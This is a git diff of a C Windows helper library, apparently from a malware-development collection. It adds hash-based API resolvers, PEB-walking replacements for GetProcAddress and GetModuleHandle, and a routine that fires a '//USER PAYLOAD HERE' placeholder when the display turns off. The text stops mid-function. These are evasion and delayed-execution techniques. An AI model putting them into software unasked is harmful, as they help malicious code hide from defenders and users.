return (PseudoRandomIntegerSubroutine(&Next));
|
||||
}
|
||||
return (PseudoRandomIntegerSubroutine(&Seed));
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength, ULONG Seed)
|
||||
{
|
||||
WCHAR DataSet[] = L"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||
PWCHAR String = NULL;
|
||||
|
@ -11,7 +13,7 @@ PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
|
|||
#pragma warning (disable: 4018)
|
||||
for (INT dwN = 0; dwN < dwLength; dwN++)
|
||||
{
|
||||
INT Key = CreatePseudoRandomInteger() % (INT)(StringLengthW(DataSet) - 1);
|
||||
INT Key = CreatePseudoRandomInteger(Seed) % (INT)(StringLengthW(DataSet) - 1);
|
||||
String[dwN] = DataSet[Key];
|
||||
}
|
||||
#pragma warning (pop)
|
||||
|
@ -24,7 +26,7 @@ PWCHAR CreatePseudoRandomStringW(SIZE_T dwLength)
|
|||
return String;
|
||||
}
|
||||
|
||||
PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
|
||||
PCHAR CreatePseudoRandomStringA(SIZE_T dwLength, ULONG Seed)
|
||||
{
|
||||
CHAR DataSet[] = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789";
|
||||
PCHAR String = NULL;
|
||||
|
@ -37,7 +39,7 @@ PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
|
|||
#pragma warning (disable: 4018)
|
||||
for (INT dwN = 0; dwN < dwLength; dwN++)
|
||||
{
|
||||
INT Key = CreatePseudoRandomInteger() % (INT)(StringLengthA(DataSet) - 1);
|
||||
INT Key = CreatePseudoRandomInteger(Seed) % (INT)(StringLengthA(DataSet) - 1);
|
||||
String[dwN] = DataSet[Key];
|
||||
}
|
||||
#pragma warning (pop)
|
||||
|
@ -48,4 +50,4 @@ PCHAR CreatePseudoRandomStringA(SIZE_T dwLength)
|
|||
#pragma warning (pop)
|
||||
|
||||
return String;
|
||||
}
|
||||
}
|
|
@ -1,16 +1,11 @@
|
|||
/*
|
||||
#include "Win32Helper.h"
|
||||
|
||||
pBuffer == OUT
|
||||
Path == concatted, must have \\ in front i.e. L"\\File.exe"
|
||||
|
||||
Credit: smelly__vx
|
||||
*/
|
||||
BOOL CreateWindowsObjectPathW(PWCHAR pBuffer, PWCHAR Path, DWORD Size, BOOL bDoesObjectExist)
|
||||
{
|
||||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
||||
if (!RfGetSystemWindowsDirectoryW(Size, pBuffer))
|
||||
if (!GetSystemWindowsDirectoryW(Size, pBuffer))
|
||||
return FALSE;
|
||||
|
||||
if (StringConcatW(pBuffer, Path) == 0)
|
||||
|
@ -30,7 +25,7 @@ BOOL CreateWindowsObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL bDoesO
|
|||
if (pBuffer == NULL)
|
||||
return FALSE;
|
||||
|
||||
if (!RfGetSystemWindowsDirectoryA(Size, pBuffer))
|
||||
if (!GetSystemWindowsDirectoryA(Size, pBuffer))
|
||||
return FALSE;
|
||||
|
||||
if (StringConcatA(pBuffer, Path) == 0)
|
||||
|
@ -43,4 +38,4 @@ BOOL CreateWindowsObjectPathA(PCHAR pBuffer, PCHAR Path, DWORD Size, BOOL bDoesO
|
|||
}
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,82 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
#include "powrprof.h"
|
||||
|
||||
typedef DWORD(WINAPI* POWERSETTINGREGISTERNOTIFICATION)(LPCGUID, DWORD, HANDLE, PHPOWERNOTIFY);
|
||||
typedef DWORD(WINAPI* POWERSETTINGUNREGISTERNOTIFICATION)(HPOWERNOTIFY);
|
||||
|
||||
ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting);
|
||||
|
||||
ULONG CALLBACK HandlePowerNotifications(PVOID Context, ULONG Type, PVOID Setting)
|
||||
{
|
||||
PPOWERBROADCAST_SETTING PowerSettings = (PPOWERBROADCAST_SETTING)Setting;
|
||||
|
||||
if (Type == PBT_POWERSETTINGCHANGE && PowerSettings->PowerSetting == GUID_CONSOLE_DISPLAY_STATE)
|
||||
{
|
||||
switch (*PowerSettings->Data)
|
||||
{
|
||||
case 0x0:
|
||||
case 0x1:
|
||||
break;
|
||||
|
||||
case 0x2:
|
||||
{
|
||||
//USER PAYLOAD HERE
|
||||
break;
|
||||
}
|
||||
|
||||
default:
|
||||
break;
|
||||
}
|
||||
}
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
}
|
||||
|
||||
BOOL DelayedExecutionExecuteOnDisplayOff(VOID)
|
||||
{
|
||||
DWORD dwError = ERROR_SUCCESS;
|
||||
HMODULE hLibrary;
|
||||
POWERSETTINGREGISTERNOTIFICATION _PowerSettingRegisterNotification = NULL;
|
||||
POWERSETTINGUNREGISTERNOTIFICATION _PowerSettingUnregisterNotification = NULL;
|
||||
DEVICE_NOTIFY_SUBSCRIBE_PARAMETERS NotificationsParameters;
|
||||
HANDLE hNotificationRegister = NULL;
|
||||
|
||||
hLibrary = LoadLibrary(L"powrprof.dll");
|
||||
if (hLibrary == NULL)
|
||||
goto FAILURE;
|
||||
|
||||
_PowerSettingRegisterNotification = (POWERSETTINGREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingRegisterNotification");
|
||||
_PowerSettingUnregisterNotification = (POWERSETTINGUNREGISTERNOTIFICATION)GetProcAddress(hLibrary, "PowerSettingUnregisterNotification");
|
||||
|
||||
if (!_PowerSettingRegisterNotification || !_PowerSettingUnregisterNotification)
|
||||
goto FAILURE;
|
||||
|
||||
NotificationsParameters.Callback = HandlePowerNotifications;
|
||||
NotificationsParameters.Context = NULL;
|
||||
|
||||
if (_PowerSettingRegisterNotification(&GUID_CONSOLE_DISPLAY_STATE, DEVICE_NOTIFY_CALLBACK,
|
||||
(HANDLE)&NotificationsParameters, &hNotificationRegister) != ERROR_SUCCESS)
|
||||
{
|
||||
goto FAILURE;
|
||||
}
|
||||
|
||||
if (SetThreadExecutionState(ES_AWAYMODE_REQUIRED | ES_CONTINUOUS | ES_SYSTEM_REQUIRED) == NULL)
|
||||
goto FAILURE;
|
||||
|
||||
while (1) { Sleep(100); }
|
||||
|
||||
if (hNotificationRegister)
|
||||
_PowerSettingUnregisterNotification(hNotificationRegister);
|
||||
|
||||
return ERROR_SUCCESS;
|
||||
|
||||
FAILURE:
|
||||
|
||||
dwError = GetLastError();
|
||||
|
||||
if (hNotificationRegister)
|
||||
_PowerSettingUnregisterNotification(hNotificationRegister);
|
||||
|
||||
return dwError;
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
BOOL RfDeleteFileA(PCHAR Path)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
BOOL DeleteFileExA(PCHAR Path)
|
||||
{
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
@ -17,7 +19,7 @@ BOOL RfDeleteFileA(PCHAR Path)
|
|||
return TRUE;
|
||||
}
|
||||
|
||||
BOOL RfDeleteFileW(PWCHAR Path)
|
||||
BOOL DeleteFileExW(PWCHAR Path)
|
||||
{
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
@ -34,4 +36,4 @@ BOOL RfDeleteFileW(PWCHAR Path)
|
|||
CloseHandle(hHandle);
|
||||
|
||||
return TRUE;
|
||||
}
|
||||
}
|
|
@ -1,22 +1,24 @@
|
|||
DWORD RfGetCurrentDirectoryA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetCurrentDirectoryExA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (ProcessParameters->CurrentDirectory.DosPath.Length > nBufferLength)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->CurrentDirectory.DosPath.Buffer, ProcessParameters->CurrentDirectory.DosPath.MaximumLength);
|
||||
}
|
||||
|
||||
DWORD RfGetCurrentDirectoryW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
DWORD GetCurrentDirectoryExW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (ProcessParameters->CurrentDirectory.DosPath.Length > nBufferLength)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
if (StringCopyW(lpBuffer, ProcessParameters->CurrentDirectory.DosPath.Buffer) == NULL)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return ProcessParameters->CurrentDirectory.DosPath.Length;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE GetCurrentProcessEx(VOID)
|
||||
{
|
||||
return (HANDLE)((HANDLE)-1);
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetCurrentProcessIdEx(VOID)
|
||||
{
|
||||
return HandleToUlong(GetTeb()->ClientId.UniqueProcess);
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE GetCurrentThreadEx(VOID)
|
||||
{
|
||||
return ((HANDLE)(LONG_PTR)-2);
|
||||
}
|
|
@ -1,9 +1,15 @@
|
|||
/*
|
||||
hToken can be NULL
|
||||
DisposeProcessHandle closes hToken automatically
|
||||
if DisposeProcessHandle is FALSE you need to close it yourself
|
||||
The value returned by this function needs to be freed with HeapFree
|
||||
*/
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetTokenInformationBufferSize(HANDLE hToken)
|
||||
{
|
||||
PTOKEN_GROUPS TokenGroup = NULL;
|
||||
DWORD dwReturn = ERROR_SUCCESS;
|
||||
|
||||
GetTokenInformation(hToken, TokenGroups, (LPVOID)TokenGroup, 0, &dwReturn);
|
||||
|
||||
return dwReturn;
|
||||
}
|
||||
|
||||
LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
|
||||
{
|
||||
typedef BOOL(WINAPI* CONVERTSIDTOSTRINGSIDW)(PSID, LPWSTR*);
|
||||
|
@ -19,18 +25,18 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
if (hAdvapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ConvertSidToStringSidW = (CONVERTSIDTOSTRINGSIDW)RfGetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidW");
|
||||
ConvertSidToStringSidW = (CONVERTSIDTOSTRINGSIDW)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidW");
|
||||
if (!ConvertSidToStringSidW)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
dwError = GetTokenInformationBufferSize(hToken);
|
||||
if (dwError == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
TokenGroup = (PTOKEN_GROUPS)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
|
||||
TokenGroup = (PTOKEN_GROUPS)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
|
||||
if (TokenGroup == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -46,7 +52,7 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
|
||||
dwError = GetLengthSid(TokenGroup->Groups[dwIndex].Sid);
|
||||
|
||||
Sid = (PSID)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
|
||||
Sid = (PSID)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
|
||||
if (Sid == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -65,13 +71,13 @@ LPWSTR GetCurrentUserSidW(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
|
||||
if (TokenGroup)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, TokenGroup);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, TokenGroup);
|
||||
|
||||
if (Sid)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, Sid);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, Sid);
|
||||
|
||||
if (hAdvapi)
|
||||
FreeLibrary(hAdvapi);
|
||||
|
@ -100,18 +106,18 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
if (hAdvapi == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
ConvertSidToStringSidA = (CONVERTSIDTOSTRINGSIDA)RfGetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidA");
|
||||
ConvertSidToStringSidA = (CONVERTSIDTOSTRINGSIDA)GetProcAddressA((DWORD64)hAdvapi, "ConvertSidToStringSidA");
|
||||
if (!ConvertSidToStringSidA)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
if (!OpenProcessToken(RfGetCurrentProcess(), TOKEN_ALL_ACCESS, &hToken))
|
||||
if (!OpenProcessToken(GetCurrentProcessEx(), TOKEN_ALL_ACCESS, &hToken))
|
||||
return NULL;
|
||||
|
||||
dwError = GetTokenInformationBufferSize(hToken);
|
||||
if (dwError == 0)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
TokenGroup = (PTOKEN_GROUPS)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
|
||||
TokenGroup = (PTOKEN_GROUPS)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
|
||||
if (TokenGroup == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -127,7 +133,7 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
|
||||
dwError = GetLengthSid(TokenGroup->Groups[dwIndex].Sid);
|
||||
|
||||
Sid = (PSID)HeapAlloc(RfGetProcessHeap(), HEAP_ZERO_MEMORY, dwError);
|
||||
Sid = (PSID)HeapAlloc(GetProcessHeapEx(), HEAP_ZERO_MEMORY, dwError);
|
||||
if (Sid == NULL)
|
||||
goto EXIT_ROUTINE;
|
||||
|
||||
|
@ -146,13 +152,13 @@ LPSTR GetCurrentUserSidA(HANDLE hToken, BOOL DisposeProcessHandle)
|
|||
EXIT_ROUTINE:
|
||||
|
||||
if (!bFlag)
|
||||
dwError = EhGetLastError();
|
||||
dwError = GetLastErrorEx();
|
||||
|
||||
if (TokenGroup)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, TokenGroup);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, TokenGroup);
|
||||
|
||||
if (Sid)
|
||||
HeapFree(RfGetProcessHeap(), HEAP_ZERO_MEMORY, Sid);
|
||||
HeapFree(GetProcessHeapEx(), HEAP_ZERO_MEMORY, Sid);
|
||||
|
||||
if (hAdvapi)
|
||||
FreeLibrary(hAdvapi);
|
||||
|
@ -164,4 +170,4 @@ EXIT_ROUTINE:
|
|||
}
|
||||
|
||||
return (bFlag ? pSid : NULL);
|
||||
}
|
||||
}
|
|
@ -1,22 +1,24 @@
|
|||
DWORD RfGetCurrentWindowTextA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetCurrentWindowTextA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (nBufferLength < ProcessParameters->WindowTitle.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return (DWORD)WCharStringToCharString(lpBuffer, ProcessParameters->WindowTitle.Buffer, ProcessParameters->WindowTitle.MaximumLength);
|
||||
}
|
||||
|
||||
DWORD RfGetCurrentWindowTextW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
DWORD GetCurrentWindowTextW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PRTL_USER_PROCESS_PARAMETERS ProcessParameters = GetPeb()->ProcessParameters;
|
||||
|
||||
if (nBufferLength < ProcessParameters->WindowTitle.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
if (StringCopyW(lpBuffer, ProcessParameters->WindowTitle.Buffer) == NULL)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return ProcessParameters->WindowTitle.Length;
|
||||
}
|
||||
}
|
|
@ -1,8 +1,10 @@
|
|||
LONGLONG RfGetFileSizeFromPathDisposeHandleW(PWCHAR Path, DWORD dwFlagsAndAttributes)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
LONGLONG GetFileSizeFromPathW(PWCHAR Path, DWORD dwFlagsAndAttributes)
|
||||
{
|
||||
LARGE_INTEGER LargeInteger;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
||||
|
||||
hHandle = CreateFileW(Path, GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, dwFlagsAndAttributes, NULL);
|
||||
if (hHandle == INVALID_HANDLE_VALUE)
|
||||
return INVALID_FILE_SIZE;
|
||||
|
@ -11,14 +13,14 @@ LONGLONG RfGetFileSizeFromPathDisposeHandleW(PWCHAR Path, DWORD dwFlagsAndAttrib
|
|||
{
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
|
||||
return LargeInteger.QuadPart;
|
||||
}
|
||||
|
||||
|
||||
return INVALID_FILE_SIZE;
|
||||
}
|
||||
|
||||
LONGLONG RfGetFileSizeFromPathDisposeHandleA(PCHAR Path, DWORD dwFlagsAndAttributes)
|
||||
LONGLONG GetFileSizeFromPathA(PCHAR Path, DWORD dwFlagsAndAttributes)
|
||||
{
|
||||
LARGE_INTEGER LargeInteger;
|
||||
HANDLE hHandle = INVALID_HANDLE_VALUE;
|
||||
|
@ -31,9 +33,9 @@ LONGLONG RfGetFileSizeFromPathDisposeHandleA(PCHAR Path, DWORD dwFlagsAndAttribu
|
|||
{
|
||||
if (hHandle)
|
||||
CloseHandle(hHandle);
|
||||
|
||||
|
||||
return LargeInteger.QuadPart;
|
||||
}
|
||||
|
||||
|
||||
return INVALID_FILE_SIZE;
|
||||
}
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PKUSER_SHARED_DATA GetKUserSharedData(VOID)
|
||||
{
|
||||
return (KUSER_SHARED_DATA*)0x7FFE0000;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetLastErrorEx(VOID)
|
||||
{
|
||||
return GetTeb()->LastErrorValue;
|
||||
}
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
NTSTATUS GetLastNtStatusEx(VOID)
|
||||
{
|
||||
return GetTeb()->LastStatusValue;
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
HMODULE GetModuleHandleExA(LPCSTR lpModuleName)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
@ -12,7 +14,7 @@ HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
|
|||
Module = (PLDR_MODULE)((PBYTE)Next - 16);
|
||||
if (Module->BaseDllName.Buffer != NULL)
|
||||
{
|
||||
RfZeroMemory(wDllName, sizeof(wDllName));
|
||||
ZeroMemoryEx(wDllName, sizeof(wDllName));
|
||||
WCharStringToCharString(wDllName, Module->BaseDllName.Buffer, 64);
|
||||
if (StringCompareA(lpModuleName, wDllName) == 0)
|
||||
return (HMODULE)Module->BaseAddress;
|
||||
|
@ -22,7 +24,7 @@ HMODULE RfGetModuleHandleA(LPCSTR lpModuleName)
|
|||
return NULL;
|
||||
}
|
||||
|
||||
HMODULE RfGetModuleHandleW(LPCWSTR lpModuleName)
|
||||
HMODULE GetModuleHandleExW(LPCWSTR lpModuleName)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
@ -44,4 +46,4 @@ HMODULE RfGetModuleHandleW(LPCWSTR lpModuleName)
|
|||
}
|
||||
|
||||
return NULL;
|
||||
}
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
DWORD GetLinkedDllCount(VOID)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetNumberOfLinkedDlls(VOID)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
|
@ -15,4 +17,4 @@ DWORD GetLinkedDllCount(VOID)
|
|||
}
|
||||
|
||||
return dwCount;
|
||||
}
|
||||
}
|
|
@ -0,0 +1,27 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetOSIdentificationData(DWORD Id)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
|
||||
switch (Id)
|
||||
{
|
||||
case 0:
|
||||
return Peb->OSMajorVersion;
|
||||
|
||||
case 1:
|
||||
return Peb->OSMinorVersion;
|
||||
|
||||
case 2:
|
||||
return Peb->OSBuildNumber;
|
||||
|
||||
case 3:
|
||||
return Peb->OSPlatformId;
|
||||
|
||||
default:
|
||||
return 0;
|
||||
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
|
@ -0,0 +1,21 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
PPEB GetPeb(VOID)
|
||||
{
|
||||
#if defined(_WIN64)
|
||||
return (PPEB)__readgsqword(0x60);
|
||||
#elif define(_WIN32)
|
||||
return (PPEB)__readfsdword(0x30);
|
||||
#endif
|
||||
}
|
||||
|
||||
PPEB GetPebEx(VOID)
|
||||
{
|
||||
PTEB Teb;
|
||||
#if defined(_WIN64)
|
||||
Teb = (PTEB)__readgsqword(0x30);
|
||||
#elif define(_WIN32)
|
||||
Teb = (PTEB)__readfsdword(0x18);
|
||||
#endif
|
||||
return (PPEB)Teb->ProcessEnvironmentBlock;
|
||||
}
|
|
@ -1,4 +1,6 @@
|
|||
DWORD64 __stdcall RfGetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
PIMAGE_DOS_HEADER Dos;
|
||||
|
@ -16,14 +18,14 @@ DWORD64 __stdcall RfGetProcAddressA(DWORD64 ModuleBase, LPCSTR lpProcName)
|
|||
for (DWORD dwX = 0; dwX < ExportTable->NumberOfNames; dwX++)
|
||||
{
|
||||
pFunctionName = FunctionNameAddressArray[dwX] + (PBYTE)ModuleBase;
|
||||
if(StringCompareA((PCHAR)pFunctionName, lpProcName) == 0)
|
||||
if (StringCompareA((PCHAR)pFunctionName, lpProcName) == 0)
|
||||
return ((DWORD64)ModuleBase + FunctionAddressArray[FunctionOrdinalAddressArray[dwX]]);
|
||||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
|
||||
DWORD64 __stdcall RfGetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
|
||||
DWORD64 __stdcall GetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
PIMAGE_DOS_HEADER Dos;
|
||||
|
@ -51,4 +53,4 @@ DWORD64 __stdcall RfGetProcAddressW(DWORD64 ModuleBase, LPCWSTR lpProcName)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressDjb2(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressDjb2(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressFowlerNollVoVariant1a(DWORD64 ModuleBase, DWORD6
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressJenkinsOneAtATime32Bit(DWORD64 ModuleBase, DWORD
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressLoseLose(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressLoseLose(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressRotr32(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressRotr32(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressSdbm(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressSdbm(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressSuperFastHash(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
||||
|
@ -23,4 +25,4 @@ DWORD64 __stdcall GetProcAddressSuperFastHash(DWORD64 ModuleBase, DWORD64 Hash)
|
|||
}
|
||||
|
||||
return 0;
|
||||
}
|
||||
}
|
|
@ -1,3 +1,5 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
DWORD64 __stdcall GetProcAddressUnknownGenericHash1(DWORD64 ModuleBase, DWORD64 Hash)
|
||||
{
|
||||
PBYTE pFunctionName;
|
|
@ -0,0 +1,6 @@
|
|||
#include "Win32Helper.h"
|
||||
|
||||
HANDLE GetProcessHeapEx(VOID)
|
||||
{
|
||||
return GetPeb()->ProcessHeap;
|
||||
}
|
|
@ -1,26 +1,28 @@
|
|||
DWORD GetInMemoryModulePathFromLoaderLoadModuleA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
#include "Win32Helper.h"
|
||||
|
||||
DWORD GetProcessPathFromLoaderLoadModuleA(DWORD nBufferLength, PCHAR lpBuffer)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
Module = (PLDR_MODULE)((PBYTE)Peb->LoaderData->InMemoryOrderModuleList.Flink - 16);
|
||||
|
||||
if (nBufferLength < Module->FullDllName.Length)
|
||||
return ERROR_FAILURE_RETURN;
|
||||
return 0;
|
||||
|
||||
return (DWORD)WCharStringToCharString(lpBuffer, Module->FullDllName.Buffer, Module->FullDllName.MaximumLength);
|
||||
}
|
||||
|
||||
DWORD GetInMemoryModulePathFromLoaderLoadModuleW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
DWORD GetProcessPathFromLoaderLoadModuleW(DWORD nBufferLength, PWCHAR lpBuffer)
|
||||
{
|
||||
PPEB Peb = GetPeb();
|
||||
PLDR_MODULE Module = NULL;
|
||||
